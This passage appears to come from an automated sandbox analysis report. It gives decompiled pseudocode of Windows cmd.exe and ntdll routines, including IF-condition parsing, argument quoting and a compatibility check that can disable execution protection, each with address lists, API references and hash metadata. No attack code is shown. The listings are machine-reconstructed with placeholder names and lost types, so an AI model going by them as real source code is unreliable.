					_t73 = E4A55661C();
					if(_t73 != 0) {
						_t73 = WideCharToMultiByte( *0x4a5741b8, __ebx, 0x4a588640, _t105, __ebx, __ebx, __ebx, __ebx);
						_t105 = _t73;
					}
					L33:
					__imp___get_osfhandle(1);
					_t48 = SetFilePointer(_t73,  *(_t107 - 0x208),  ~_t105, _t74);
					goto L14;
				}
			}
























                                0x4a556640
                                0x4a556640
                                0x4a556640
                                0x4a556640
                                0x4a556640
                                0x4a556640
                                0x4a556648
                                0x4a55664d
                                0x4a556651
                                0x00000000
                                0x00000000
                                0x4a556657
                                0x4a55666a
                                0x4a556676
                                0x4a55667d
                                0x4a556687
                                0x4a5566f7
                                0x4a5566ff
                                0x4a556703
                                0x4a5567c5
                                0x4a5567c5
                                0x4a5567c8
                                0x4a5566c6
                                0x4a5566c6
                                0x4a5566ca
                                0x4a5566d0
                                0x00000000
                                0x00000000
                                0x4a5566bd
                                0x4a5566c2
                                0x00000000
                                0x00000000
                                0x4a5566c4
                                0x4a5566c5
                                0x4a5566c5
                                0x4a5566d2
                                0x4a5566d6
                                0x4a5566da
                                0x4a5566da
                                0x4a5566e0
                                0x4a5566e2
                                0x4a5566eb
                                0x4a5566f1
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5566f1
                                0x4a556709
                                0x4a556710
                                0x4a556526
                                0x4a55652c
                                0x4a556531
                                0x4a55653a
                                0x4a55653b
                                0x4a55653e
                                0x4a556545
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a556716
                                0x4a556716
                                0x4a556716
                                0x4a55671b
                                0x4a55672b
                                0x4a55672d
                                0x4a55672f
                                0x4a55673b
                                0x4a55673e
                                0x4a55673e
                                0x4a55f3fa
                                0x4a55f400
                                0x4a5601de
                                0x4a5601df
                                0x4a5647c7
                                0x4a5647cd
                                0x4a5647e2
                                0x4a5647ea
                                0x00000000
                                0x4a5647ea
                                0x4a55f406
                                0x4a55f40c
                                0x00000000
                                0x00000000
                                0x4a55f412
                                0x4a55f41f
                                0x4a55f425
                                0x4a556716
                                0x4a556716
                                0x4a556716
                                0x4a55671b
                                0x4a55672b
                                0x4a55672d
                                0x4a55672f
                                0x4a55673b
                                0x4a55673e
                                0x4a55673e
                                0x00000000
                                0x4a55673e
                                0x00000000
                                0x4a55674c
                                0x4a556763
                                0x4a556765
                                0x4a556766
                                0x4a55676e
                                0x00000000
                                0x00000000
                                0x4a556774
                                0x4a556774
                                0x4a55677c
                                0x00000000
                                0x00000000
                                0x4a556782
                                0x4a556785
                                0x00000000
                                0x4a5567a5
                                0x4a5567a5
                                0x4a5567ae
                                0x4a5567bb
                                0x4a5567bf
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5567bf
                                0x4a556785
                                0x4a556716
                                0x4a556689
                                0x4a556694
                                0x4a556699
                                0x4a5566a0
                                0x4a564784
                                0x4a564786
                                0x4a564799
                                0x4a564799
                                0x4a5647bf
                                0x4a5647bf
                                0x00000000
                                0x4a5647bf
                                0x4a564788
                                0x4a564788
                                0x4a564789
                                0x4a56478a
                                0x4a56478b
                                0x4a56478c
                                0x4a564792
                                0x4a5647b2
                                0x4a5647b9
                                0x00000000
                                0x4a5647b9
                                0x4a5566a6
                                0x4a5566a8
                                0x4a5647a1
                                0x4a5647a1
                                0x4a5647a9
                                0x4a5647ab
                                0x4a5647ad
                                0x4a5647b0
                                0x4a5647b1
                                0x00000000
                                0x4a5647b1
                                0x4a5566ae
                                0x4a5566b8
                                0x00000000
                                0x4a5601ad
                                0x4a5601b7
                                0x4a5601cb
                                0x00000000
                                0x00000000
                                0x4a5601d1
                                0x4a564720
                                0x4a564720
                                0x4a56472c
                                0x00000000
                                0x00000000
                                0x4a564732
                                0x4a564741
                                0x4a564743
                                0x4a56474a
                                0x4a56475d
                                0x4a564763
                                0x4a564763
                                0x4a564765
                                0x4a564771
                                0x4a564779
                                0x00000000
                                0x4a564779

                                APIs
                                  • Part of subcall function 4A5518EB: wcschr.MSVCRT ref: 4A551900
                                • _wcsicmp.MSVCRT ref: 4A55667D
                                • _get_osfhandle.MSVCRT ref: 4A55672B
                                • SetFilePointer.KERNEL32(00000000), ref: 4A55672F
                                • _get_osfhandle.MSVCRT ref: 4A556763
                                • _get_osfhandle.MSVCRT ref: 4A5601B7
                                • SetFilePointer.KERNEL32(00000000,?,00000001,?,0000000A), ref: 4A5601BF
                                • WideCharToMultiByte.KERNEL32(?,4A588640,?,?,?,?,?,?,00000001,?,0000000A), ref: 4A56475D
                                • _get_osfhandle.MSVCRT ref: 4A564771
                                • SetFilePointer.KERNEL32(00000000,00000001,?,00000001,?,0000000A), ref: 4A564779
                                • WideCharToMultiByte.KERNEL32(?,4A588640,?,?,?,?,?,00000001,?,0000000A), ref: 4A5647B9
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _get_osfhandle$FilePointer$ByteCharMultiWide$_wcsicmpwcschr
                                • String ID:
                                • API String ID: 147692262-0
                                • Opcode ID: bcd70164ae5b666ab7fbbdb4050450ccfa62031746c70c4c6782baca3a432b8f
                                • Instruction ID: ef58e407370b52327249d6186f5e521cfe6b6e81de072e12a88848900c03d1f3
                                • Opcode Fuzzy Hash: bcd70164ae5b666ab7fbbdb4050450ccfa62031746c70c4c6782baca3a432b8f
                                • Instruction Fuzzy Hash: 6B51B3B1800265BBEB606A20CF88AEE7F7DEF013D4F150196E506E75A9DB319D85CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55617F, Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 96COMMON
                                Download Yara Rule
                                C-Code - Quality: 53%
                                			E4A55617F(void* __ecx, void* __edx, void* __edi, intOrPtr _a4) {
				void* __ebx;
				void* __ebp;
				intOrPtr* _t5;
				char _t6;
				intOrPtr _t9;
				char _t11;
				char _t12;
				char _t17;
				char _t18;
				intOrPtr* _t19;
				void* _t21;
				void* _t27;
				void* _t32;
				void* _t33;
				void* _t35;
				intOrPtr* _t36;

				_t33 = __edi;
				_t32 = __edx;
				_t21 = __ecx;
				if(E4A551CBF(__edi, 0) != 0x4000) {
					E4A56EE72();
				}
				_t5 = E4A5529E9(_t19, _t21, _t32, _t33, 0);
				_t36 = __imp___wcsicmp;
				_t33 = 0x4a588640;
				_t19 = _t5;
				_t6 =  *_t36(L"ERRORLEVEL", 0x4a588640, _t33, _t35, _t19);
				__eflags = _t6;
				if(_t6 == 0) {
					 *_t19 = 0x35;
					goto L2;
				} else {
					_t11 =  *_t36(L"EXIST", 0x4a588640);
					__eflags = _t11;
					if(_t11 == 0) {
						 *_t19 = 0x37;
						L2:
						_t9 = E4A5522CA(E4A553D56(_t33, 0), 0, 0);
						L12:
						 *((intOrPtr*)(_t19 + 0x3c)) = _t9;
						L11:
						return _t19;
					}
					__eflags =  *0x4a574081;
					if( *0x4a574081 == 0) {
						L9:
						_t12 =  *_t36("NOT", _t33);
						_pop(_t27);
						__eflags = _t12;
						if(_t12 == 0) {
							__eflags = _a4 - _t12;
							if(_a4 != _t12) {
								E4A56EE72();
							}
							 *_t19 = 0x38;
							_t9 = E4A55617F(_t27, _t32, _t33, 1);
							goto L12;
						}
						__eflags = 0;
						E4A551D26(0, 0, 0, 0);
						 *_t19 = 0x39;
						E4A556262(__eflags, _t19);
						goto L11;
					}
					_t17 =  *_t36(L"CMDEXTVERSION", 0x4a588640);
					__eflags = _t17;
					if(_t17 == 0) {
						 *_t19 = 0x34;
						goto L2;
					}
					__eflags =  *0x4a574081;
					if( *0x4a574081 == 0) {
						goto L9;
					}
					_t18 =  *_t36(L"DEFINED", 0x4a588640);
					__eflags = _t18;
					if(_t18 == 0) {
						goto L1;
					}
					goto L9;
				}
				L1:
				 *_t19 = 0x36;
				goto L2;
			}



















                                0x4a55617f
                                0x4a55617f
                                0x4a55617f
                                0x4a556190
                                0x4a567e66
                                0x4a567e66
                                0x4a55619b
                                0x4a5561a0
                                0x4a5561a6
                                0x4a5561b1
                                0x4a5561b3
                                0x4a5561b7
                                0x4a5561b9
                                0x4a567e70
                                0x00000000
                                0x4a5561bf
                                0x4a5561c5
                                0x4a5561c9
                                0x4a5561cb
                                0x4a556afe
                                0x4a5553ef
                                0x4a5553fa
                                0x4a556234
                                0x4a556234
                                0x4a55622b
                                0x4a556231
                                0x4a556231
                                0x4a5561d1
                                0x4a5561d8
                                0x4a556207
                                0x4a55620d
                                0x4a556210
                                0x4a556211
                                0x4a556213
                                0x4a556239
                                0x4a55623c
                                0x4a567e86
                                0x4a567e86
                                0x4a556244
                                0x4a55624a
                                0x00000000
                                0x4a55624a
                                0x4a556215
                                0x4a55621a
                                0x4a556220
                                0x4a556226
                                0x00000000
                                0x4a556226
                                0x4a5561e0
                                0x4a5561e4
                                0x4a5561e6
                                0x4a567e7b
                                0x00000000
                                0x4a567e7b
                                0x4a5561ec
                                0x4a5561f3
                                0x00000000
                                0x00000000
                                0x4a5561fb
                                0x4a5561ff
                                0x4a556201
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a556201
                                0x4a55466c
                                0x4a55466c
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmp
                                • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                • API String ID: 2081463915-1668778490
                                • Opcode ID: f87619d8d98f6c746d64e96a7e8a7e1cc170052c9e0a90004c0b2a2a177e1e9d
                                • Instruction ID: 1ce0d54dc448d332485bbc2bf841c509e48d88b7273abff3fed5a3f165df1f84
                                • Opcode Fuzzy Hash: f87619d8d98f6c746d64e96a7e8a7e1cc170052c9e0a90004c0b2a2a177e1e9d
                                • Instruction Fuzzy Hash: 9A21D3F1919292B9EB311AB5EF40F2B6EECDFC22E0F010427F504E958DDAB08940C636
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5714FD, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 328COMMON
                                Download Yara Rule
                                C-Code - Quality: 90%
                                			E4A5714FD(void* __ecx, void* __edx, void* _a4, signed int _a8, intOrPtr _a12, signed int _a15, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				signed int _v16;
				int _v20;
				void* _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _v68;
				void* _v72;
				short _v74;
				short _v76;
				void* _v80;
				short _v82;
				short _v84;
				void* _v88;
				short _v90;
				short _v92;
				void* _v96;
				short _v98;
				short _v100;
				void* _v104;
				short _v106;
				short _v108;
				void* _v112;
				short _v114;
				short _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				char _v132;
				void* _t108;
				int _t118;
				void* _t121;
				intOrPtr* _t132;
				signed int _t135;
				void* _t137;
				void* _t138;
				void* _t139;
				short _t147;
				void _t148;
				long _t151;
				long _t153;
				signed int _t154;
				void* _t158;
				signed int _t159;
				intOrPtr _t160;
				int _t161;
				int _t163;
				void* _t165;
				intOrPtr _t166;
				intOrPtr* _t169;
				intOrPtr* _t170;
				intOrPtr _t171;
				void* _t174;
				signed short _t182;
				void* _t183;
				intOrPtr* _t184;
				intOrPtr* _t185;
				void* _t186;
				signed short* _t196;
				signed int _t197;
				signed int _t199;
				signed short* _t204;
				int _t205;
				intOrPtr _t206;
				intOrPtr _t207;
				signed int _t209;
				void* _t210;
				void* _t211;
				short* _t212;
				intOrPtr _t215;
				intOrPtr _t216;
				void* _t218;

				_t183 = __edx;
				_t165 = __ecx;
				_v116 = 0;
				_v114 = 0;
				_t159 = 0;
				_v132 = 0;
				_v128 = 0;
				_v124 = 0;
				_v120 = 0;
				asm("stosd");
				_v108 = 0;
				_v106 = 0;
				asm("stosd");
				_v100 = 0;
				_v98 = 0;
				asm("stosd");
				_v92 = 0;
				_v90 = 0;
				asm("stosd");
				_v84 = 0;
				_v82 = 0;
				asm("stosd");
				_v76 = 0;
				_v74 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E4A5635BA(0);
				_t108 = E4A552041(0x2c);
				_t203 = _t108;
				 *((intOrPtr*)(_t108 + 8)) = 0x800;
				_v12 = 0;
				_t219 = _a12;
				if(_a12 != 0) {
					_push(0x10);
					_pop(0);
					_v12 = 0;
				}
				E4A55B210(_t183, _t219, _a4,  &_v132);
				_t220 = _v56 - _t159;
				if(_v56 == _t159 || E4A559662(_t165, _t183, _t220, _v56) == 1 || E4A55A005( &_v132, _t159, 1,  &_v8) == 1 || E4A559AD4(_t183, _v8, _t203, 0, _v12, _t159, _t159, _t159, _t159, _t159, _t159) != 0) {
					L58:
					E4A55963C();
					__eflags = 0;
					return 0;
				} else {
					_t166 = _v8;
					_t118 =  *(_t166 + 0x14);
					if(_t118 != _t159) {
						qsort( *(_t166 + 0x1c), _t118, 4, E4A570BD5);
						_t218 = _t218 + 0x10;
					}
					_t204 = _a4;
					_t196 = _t204;
					_a15 = _t159;
					if(_a8 <= _t159) {
						L20:
						 *_t204 = 0;
						_t205 =  *(_v8 + 0x14);
						_v20 = _t205;
						_t121 = calloc(4, _t205);
						 *0x4a5906c0 = _t121;
						if(_t121 == _t159) {
							goto L58;
						}
						_t197 = 0;
						_v12 = 0;
						_a8 = _t159;
						if(_t205 <= _t159) {
							L57:
							E4A55142E( *((intOrPtr*)(_v8 + 0x18)));
							E4A55142E( *((intOrPtr*)(_v8 + 4)));
							E4A55142E(_v8);
							E4A55963C();
							return _a8;
						} else {
							goto L22;
						}
						do {
							L22:
							_t132 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1c)) + _t197 * 4)) + 0x30;
							_t184 = E4A552EC4;
							_t169 = _t132;
							while(1) {
								_t206 =  *_t169;
								if(_t206 !=  *_t184) {
									break;
								}
								if(_t206 == _t159) {
									L27:
									_t169 = 0;
									L29:
									if(_t169 == _t159) {
										goto L56;
									}
									_t185 = E4A552EBC;
									_t170 = _t132;
									while(1) {
										_t207 =  *_t170;
										if(_t207 !=  *_t185) {
											break;
										}
										if(_t207 == _t159) {
											L35:
											_t170 = 0;
											L37:
											if(_t170 == _t159) {
												goto L56;
											}
											_t186 = _t132 + 2;
											do {
												_t171 =  *_t132;
												_t132 = _t132 + 2;
											} while (_t171 != _t159);
											_t160 = _a16;
											_t135 = _t132 - _t186 >> 1;
											_v16 = _t135;
											_t209 = _a8 << 2;
											_t137 = calloc(_t135 + _t160 + 4, 2);
											_t174 =  *0x4a5906c0; // 0x0
											 *(_t174 + _t209) = _t137;
											_t138 =  *0x4a5906c0; // 0x0
											if( *((intOrPtr*)(_t138 + _t209)) == 0) {
												L55:
												_t159 = 0;
												__eflags = 0;
												goto L56;
											}
											if(_a15 != 0) {
												_t199 = 0;
												__eflags = 0;
												L49:
												__eflags = _a15;
												_t139 =  *0x4a5906c0; // 0x0
												_t210 =  *(_t139 + _t209);
												if(_a15 != 0) {
													_t148 = 0x22;
													 *_t210 = _t148;
													_t210 = _t210 + 2;
													__eflags = _t210;
												}
												_t161 = _t160 + _t160;
												memcpy(_t210, _a4, _t161);
												_t211 = _t210 + _t161;
												_t163 = _v16 + _v16;
												memcpy(_t211,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4)) + 0x30, _t163);
												_t218 = _t218 + 0x18;
												_t212 = _t211 + _t163;
												__eflags = _a15;
												if(_a15 != 0) {
													_t147 = 0x22;
													 *_t212 = _t147;
													_t212 = _t212 + 2;
													__eflags = _t199;
													if(_t199 != 0) {
														_a15 = 0;
													}
												}
												_t94 =  &_a8;
												 *_t94 = _a8 + 1;
												__eflags =  *_t94;
												 *_t212 = 0;
												goto L55;
											}
											_t199 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1c)) + _t197 * 4)) + 0x30;
											while(1) {
												_t151 =  *_t199 & 0x0000ffff;
												if(_t151 == 0) {
													goto L49;
												}
												if(wcschr(L" &()[]{}^=;!%\'+,`~", _t151) != 0) {
													_a15 = 1;
												}
												_t199 = _t199 + 2;
											}
											goto L49;
										}
										_t215 =  *((intOrPtr*)(_t170 + 2));
										_t68 = _t185 + 2; // 0x2e
										if(_t215 !=  *_t68) {
											break;
										}
										_t170 = _t170 + 4;
										_t185 = _t185 + 4;
										if(_t215 != _t159) {
											continue;
										}
										goto L35;
									}
									asm("sbb ecx, ecx");
									asm("sbb ecx, 0xffffffff");
									goto L37;
								}
								_t216 =  *((intOrPtr*)(_t169 + 2));
								_t66 = _t184 + 2; // 0x5c0000
								if(_t216 !=  *_t66) {
									break;
								}
								_t169 = _t169 + 4;
								_t184 = _t184 + 4;
								if(_t216 != _t159) {
									continue;
								}
								goto L27;
							}
							asm("sbb ecx, ecx");
							asm("sbb ecx, 0xffffffff");
							goto L29;
							L56:
							_t197 = _v12 + 1;
							__eflags = _t197 - _v20;
							_v12 = _t197;
						} while (_t197 < _v20);
						goto L57;
					} else {
						do {
							_t153 =  *_t196 & 0x0000ffff;
							if(_t153 == 0) {
								break;
							}
							if(_t153 != 0x22) {
								_t154 = wcschr(L" &()[]{}^=;!%\'+,`~", _t153);
								__eflags = _t154;
								if(_t154 != 0) {
									_a15 = 1;
								}
								 *_t204 =  *_t196;
								_t204 =  &(_t204[1]);
								_t196 =  &(_t196[1]);
								_t159 = _t159 + 2;
								__eflags = _t159;
							} else {
								_t158 = 2;
								_t159 = _t159 + _t158;
								_t196 = _t196 + _t158;
								_a15 = 1;
								if(_a16 >= _t159 >> 1) {
									_a16 = _a16 - 1;
								}
								if( *_t196 == 0x22) {
									_t182 = 0x22;
									 *_t204 = _t182;
									_t204 = _t204 + _t158;
									_t196 = _t196 + _t158;
									_t159 = _t159 + _t158;
								}
							}
						} while (_t159 >> 1 < _a8);
						_t159 = 0;
						goto L20;
					}
				}
			}

















































































                                0x4a5714fd
                                0x4a5714fd
                                0x4a57150a
                                0x4a57150e
                                0x4a571513
                                0x4a571515
                                0x4a571518
                                0x4a57151b
                                0x4a57151e
                                0x4a571526
                                0x4a571527
                                0x4a57152b
                                0x4a571532
                                0x4a571533
                                0x4a571537
                                0x4a57153e
                                0x4a57153f
                                0x4a571543
                                0x4a57154a
                                0x4a57154b
                                0x4a57154f
                                0x4a571556
                                0x4a571557
                                0x4a57155b
                                0x4a571562
                                0x4a571566
                                0x4a571567
                                0x4a571568
                                0x4a57156b
                                0x4a57156e
                                0x4a571571
                                0x4a571574
                                0x4a571577
                                0x4a57157a
                                0x4a571582
                                0x4a571583
                                0x4a571584
                                0x4a571585
                                0x4a57158c
                                0x4a571591
                                0x4a571595
                                0x4a57159c
                                0x4a57159f
                                0x4a5715a2
                                0x4a5715a4
                                0x4a5715a6
                                0x4a5715a7
                                0x4a5715a7
                                0x4a5715b1
                                0x4a5715b6
                                0x4a5715b9
                                0x4a571864
                                0x4a571864
                                0x4a571869
                                0x00000000
                                0x4a571604
                                0x4a571604
                                0x4a571607
                                0x4a57160c
                                0x4a571619
                                0x4a57161f
                                0x4a57161f
                                0x4a571625
                                0x4a571628
                                0x4a57162a
                                0x4a57162d
                                0x4a571695
                                0x4a571697
                                0x4a57169d
                                0x4a5716a3
                                0x4a5716a6
                                0x4a5716ae
                                0x4a5716b5
                                0x00000000
                                0x00000000
                                0x4a5716bb
                                0x4a5716bf
                                0x4a5716c2
                                0x4a5716c5
                                0x4a57183c
                                0x4a571842
                                0x4a57184d
                                0x4a571855
                                0x4a57185a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5716cb
                                0x4a5716cb
                                0x4a5716d4
                                0x4a5716d7
                                0x4a5716dc
                                0x4a5716de
                                0x4a5716de
                                0x4a5716e4
                                0x00000000
                                0x00000000
                                0x4a5716e9
                                0x4a571700
                                0x4a571700
                                0x4a571709
                                0x4a57170b
                                0x00000000
                                0x00000000
                                0x4a571711
                                0x4a571716
                                0x4a571718
                                0x4a571718
                                0x4a57171e
                                0x00000000
                                0x00000000
                                0x4a571723
                                0x4a57173a
                                0x4a57173a
                                0x4a571743
                                0x4a571745
                                0x00000000
                                0x00000000
                                0x4a57174b
                                0x4a57174e
                                0x4a57174e
                                0x4a571752
                                0x4a571753
                                0x4a571758
                                0x4a571760
                                0x4a571762
                                0x4a57176c
                                0x4a57176f
                                0x4a571777
                                0x4a57177d
                                0x4a571780
                                0x4a571789
                                0x4a57182a
                                0x4a57182a
                                0x4a57182a
                                0x00000000
                                0x4a57182a
                                0x4a571793
                                0x4a5717c5
                                0x4a5717c5
                                0x4a5717c7
                                0x4a5717c7
                                0x4a5717cb
                                0x4a5717d0
                                0x4a5717d3
                                0x4a5717d7
                                0x4a5717d8
                                0x4a5717dc
                                0x4a5717dc
                                0x4a5717dc
                                0x4a5717dd
                                0x4a5717e4
                                0x4a5717f5
                                0x4a5717fa
                                0x4a571802
                                0x4a571807
                                0x4a57180a
                                0x4a57180c
                                0x4a571810
                                0x4a571814
                                0x4a571815
                                0x4a571819
                                0x4a57181a
                                0x4a57181c
                                0x4a57181e
                                0x4a57181e
                                0x4a57181c
                                0x4a571824
                                0x4a571824
                                0x4a571824
                                0x4a571827
                                0x00000000
                                0x4a571827
                                0x4a57179e
                                0x4a5717bb
                                0x4a5717bb
                                0x4a5717c1
                                0x00000000
                                0x00000000
                                0x4a5717b3
                                0x4a5717b5
                                0x4a5717b5
                                0x4a5717ba
                                0x4a5717ba
                                0x00000000
                                0x4a5717bb
                                0x4a571725
                                0x4a571729
                                0x4a57172d
                                0x00000000
                                0x00000000
                                0x4a57172f
                                0x4a571732
                                0x4a571738
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a571738
                                0x4a57173e
                                0x4a571740
                                0x00000000
                                0x4a571740
                                0x4a5716eb
                                0x4a5716ef
                                0x4a5716f3
                                0x00000000
                                0x00000000
                                0x4a5716f5
                                0x4a5716f8
                                0x4a5716fe
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5716fe
                                0x4a571704
                                0x4a571706
                                0x00000000
                                0x4a57182c
                                0x4a57182f
                                0x4a571830
                                0x4a571833
                                0x4a571833
                                0x00000000
                                0x4a57162f
                                0x4a57162f
                                0x4a57162f
                                0x4a571635
                                0x00000000
                                0x00000000
                                0x4a57163b
                                0x4a57166e
                                0x4a571676
                                0x4a571678
                                0x4a57167a
                                0x4a57167a
                                0x4a571681
                                0x4a571685
                                0x4a571687
                                0x4a571689
                                0x4a571689
                                0x4a57163d
                                0x4a57163f
                                0x4a571640
                                0x4a571646
                                0x4a57164b
                                0x4a57164f
                                0x4a571651
                                0x4a571651
                                0x4a571658
                                0x4a57165c
                                0x4a57165d
                                0x4a571660
                                0x4a571662
                                0x4a571664
                                0x4a571664
                                0x4a571658
                                0x4a57168e
                                0x4a571693
                                0x00000000
                                0x4a571693
                                0x4a57162d

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: callocmemcpywcschr$qsort
                                • String ID: &()[]{}^=;!%'+,`~
                                • API String ID: 1104559731-381716982
                                • Opcode ID: 8ff7f93e8f7fca8ed95d190817aaad311cda4abeb6fa7a1db439f0962fae4eb9
                                • Instruction ID: 9e865a5c92f7c9db95a502982e0dddb24b37bda51c71074e4e6541cf7a934a1e
                                • Opcode Fuzzy Hash: 8ff7f93e8f7fca8ed95d190817aaad311cda4abeb6fa7a1db439f0962fae4eb9
                                • Instruction Fuzzy Hash: C5B1247A901205EFDB11EFA8CA80AEDBBB5FF44310F16442AE905FB261D7B09E45CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022C7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E022C7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2372088; // 0x77411b12
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E022C7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E022E3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0229DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2374218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E022E3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E022A0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E022E3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E022A8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E022E3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0230E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E022E3F92();
					_t38 = 1;
					L2:
					return E0229E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                0x022c7f08
                                0x022c7f0f
                                0x022c7f12
                                0x022c7f1b
                                0x022c7f31
                                0x022e3ead
                                0x022e3eb4
                                0x00000000
                                0x00000000
                                0x022e3eba
                                0x022e3ecd
                                0x022e3ed2
                                0x022e3ee1
                                0x022e3ee7
                                0x022e3eec
                                0x022e3f12
                                0x022e3f18
                                0x022e3f1a
                                0x00000000
                                0x00000000
                                0x022e3f20
                                0x022e3f26
                                0x022e3f28
                                0x00000000
                                0x00000000
                                0x022e3f2e
                                0x022e3f30
                                0x00000000
                                0x00000000
                                0x022e3f3a
                                0x022e3f3b
                                0x022e3f53
                                0x022e3f64
                                0x022e3f69
                                0x022e3f6c
                                0x022e3f6d
                                0x022e3f6f
                                0x022ee304
                                0x022ee30f
                                0x022ee315
                                0x022ee31e
                                0x022ee321
                                0x022ee327
                                0x022ee329
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x022ee32f
                                0x022ee32f
                                0x022ee337
                                0x022ee33a
                                0x022ee33b
                                0x022ee33d
                                0x022ee33f
                                0x022ee341
                                0x022ee341
                                0x022ee34e
                                0x022ee353
                                0x022ee358
                                0x022ee35d
                                0x022ee35f
                                0x00000000
                                0x00000000
                                0x022ee365
                                0x022ee365
                                0x022ee368
                                0x022ee36e
                                0x00000000
                                0x00000000
                                0x022ee374
                                0x022ee32f
                                0x022e3f75
                                0x022e3f7a
                                0x022e3f7c
                                0x022e3f7e
                                0x022e3f86
                                0x022c7f39
                                0x022c7f47
                                0x022c7f47
                                0x022c7f37
                                0x022c7f37
                                0x00000000

                                APIs
                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 022E3F12
                                Strings
                                • ExecuteOptions, xrefs: 022E3F04
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 022EE345
                                • Execute=1, xrefs: 022E3F5E
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 022EE2FB
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 022E3EC4
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 022E3F4A
